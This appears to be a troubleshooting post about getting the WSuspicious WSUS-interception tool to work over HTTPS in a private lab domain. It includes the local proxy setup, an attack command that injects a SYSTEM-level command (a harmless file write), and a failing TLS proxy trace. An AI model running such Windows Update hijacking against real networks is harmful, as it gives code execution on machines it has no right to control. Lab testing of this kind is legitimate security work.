My setup:
- Domain controller (Windows Server 2019): dc01.lsc.lab
- Domain client (updated Windows 10)
The client has WSUS over HTTPS configured and uses it correctly (https://dc01.lsc.lab:8531). The certificate is accepted by Microsoft Edge when accessing the IIS default page and WSUS endpoint (using a certificate with SAN issued by the domain CA).
I'm setting the system's proxy via admin PowerShell with `netsh winhttp set proxy 127.0.0.1:13337`.
I'm executing the following command: `.\WSuspicious.exe /command:" -accepteula -s -d cmd /c echo 1 > C:\hacked.txt" /autoinstall /enabletls`
(The attack does work if WSUS over HTTP is configured, so all prerequisites are met.)
This is what I get after running the command:
The WSUS Server is using HTTPS. Adding a self-signed certificate to store
Prompting user to add the certificate. Please wait.
Detected WSUS Server - dc01.lsc.lab
Listening on 'ExplicitProxyEndPoint' endpoint at Ip 127.0.0.1 and port: 13337
Hit any key to exit..
Titanium.Web.Proxy.Exceptions.ProxyConnectException: Couldn't authenticate host 'dc01.lsc.lab' with certificate 'dc01.lsc.lab'. ---> System.IO.IOException: Fehler bei Authentifizierung, da die Gegenseite den Transportstream geschlossen hat.
bei System.Net.Security.SslState.InternalEndProcessAuthentication(LazyAsyncResult lazyResult)
bei System.Net.Security.SslState.EndProcessAuthentication(IAsyncResult result)
bei System.Threading.Tasks.TaskFactory`1.FromAsyncCoreLogic(IAsyncResult iar, Func`2 endFunction, Action`1 endAction, Task`1 promise, Boolean requiresSynchronization)
--- Ende der Stapelüberwachung vom vorhergehenden Ort, an dem die Ausnahme ausgelöst wurde ---
bei System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
bei System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
bei Titanium.Web.Proxy.ProxyServer.<handleClient>d__2.MoveNext()
--- Ende der internen Ausnahmestapelüberwachung ---
bei Titanium.Web.Proxy.ProxyServer.<handleClient>d__2.MoveNext()
The Windows Update GUI shows error code 0x800b0109 (displayed as "signature errors").
When accessing any IIS page with the proxy activated and running, the certificate cannot be validated due to a missing subject alternative name (SAN).
